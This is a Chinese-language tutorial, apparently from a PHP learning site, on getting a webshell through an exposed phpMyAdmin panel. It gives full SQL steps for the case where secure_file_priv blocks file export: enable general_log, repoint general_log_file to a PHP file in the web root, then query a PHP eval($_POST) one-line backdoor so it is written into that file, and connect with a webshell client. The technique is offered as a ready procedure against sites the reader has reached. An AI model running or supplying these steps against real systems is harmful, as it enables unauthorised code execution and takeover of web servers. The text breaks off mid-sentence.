關(guān)于phpmyadmin新姿勢(shì)getshell

下面由phpMyAdmin使用教程欄目給大家介紹phpmyadmin新姿勢(shì)getshell，希望對(duì)需要的朋友有所幫助！

百度百科：phpmyadmin使用教程 是一個(gè)以php為基礎(chǔ)，以web-base方式架構(gòu)在網(wǎng)站主機(jī)上的mysql的數(shù)據(jù)庫(kù)管理工具，讓管理者可用web接口管理mysql數(shù)據(jù)庫(kù)。借由此web接口可以成為一個(gè)簡(jiǎn)易方式輸入繁雜sql語法的較佳途徑，尤其要處理大量資料的匯入及匯出更為方便。其中一個(gè)更大的優(yōu)勢(shì)在于由于phpmyadmin跟其他php程式一樣在網(wǎng)頁(yè)服務(wù)器上執(zhí)行，但是您可以在任何地方使用這些程式產(chǎn)生的html頁(yè)面，也就是于遠(yuǎn)端管理mysql數(shù)據(jù)庫(kù)，方便的建立、修改、刪除數(shù)據(jù)庫(kù)及資料表。也可借由phpmyadmin建立常用的php語法，方便編寫網(wǎng)頁(yè)時(shí)所需要的sql語法正確性。

通俗的講 其作用就是可以在web頁(yè)面方便的操作數(shù)據(jù)庫(kù)。

當(dāng)我們得到一個(gè)站點(diǎn)的phpmyadmin頁(yè)面時(shí)，下一步要做的就是getshell。

可以通過寫shell進(jìn)行提權(quán)，而我們需要滿足以下條件：

1.數(shù)據(jù)庫(kù)root權(quán)限

立即學(xué)習(xí)“PHP免費(fèi)學(xué)習(xí)筆記（深入）”；

2.知道網(wǎng)站的物理路徑

3.數(shù)據(jù)庫(kù)有寫權(quán)限

通過? select ‘‘ INTO OUTFILE ‘網(wǎng)站物理路徑’ 寫入shell?

本文主要講的是在條件3不滿足的情況下成功getshell。

?利用條件：MySQL 5.0+

MySQL 5.0+的版本會(huì)自動(dòng)創(chuàng)建日志文件，那么在服務(wù)運(yùn)行的情況下修改全局變量也是可以變動(dòng)文件位置的，但是必須要對(duì)生成日志的目錄有可讀可寫的權(quán)限。

（Linux環(huán)境下可能會(huì)比較苛刻，因?yàn)檎军c(diǎn)目錄是一個(gè)用戶，MySQL是另外一個(gè)用戶，權(quán)限管控較為嚴(yán)格，主要取決于權(quán)限配置是否得當(dāng)）

首先我們測(cè)試站點(diǎn)是否有寫權(quán)限

執(zhí)行sql語句? ? ? ? ? ? ? ?SHOW VARIABLES LIKE ‘secure_file_priv’

sql語句?SHOW VARIABLES LIKE ‘secure_file_priv’? 進(jìn)行查詢 查找secure_file_priv

secure-file-priv特性
secure-file-priv參數(shù)是用來限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()傳到哪個(gè)指定目錄的。

• 當(dāng)secure_file_priv的值為null ，表示限制mysql?不允許導(dǎo)入|導(dǎo)出

• 當(dāng)secure_file_priv的值為/tmp/ ，表示限制mysql?的導(dǎo)入|導(dǎo)出只能發(fā)生在/tmp/目錄下

• 當(dāng)secure_file_priv的值沒有具體值時(shí)，表示不對(duì)mysql?的導(dǎo)入|導(dǎo)出做限制

可以在mysql-ini文件中設(shè)置其屬性

經(jīng)測(cè)試，我們沒有寫權(quán)限

?

然后再介紹兩個(gè)MySQL全局變量（general_log、general_log file）

1. general log 指的是日志保存狀態(tài)，一共有兩個(gè)值（ON/OFF）ON代表開啟 OFF代表關(guān)閉。
2. general log file 指的是日志的保存路徑。

我們可以通過將一句話木馬寫入mysql日志中然后移動(dòng)mysql日志路徑到網(wǎng)站目錄下實(shí)現(xiàn)getshell

執(zhí)行sql語句? ?SHOW VARIABLES LIKE ‘general_log%’? 進(jìn)行模糊查詢

日志默認(rèn)關(guān)閉

我們執(zhí)行sql語句? ??

set?global?general_log?=?"ON";?????#開啟日志 SET?global?general_log_file='網(wǎng)站下物理路徑';??#更換日志路徑

成功創(chuàng)建? ?

?然后執(zhí)行特殊的查詢語句

select??'<?php  eval($_POST[aaa]);?>'

我們進(jìn)入112233.php進(jìn)行驗(yàn)證，成功寫入shell

?最后進(jìn)行菜刀連接，獲得站點(diǎn)webshell

?

以上就是關(guān)于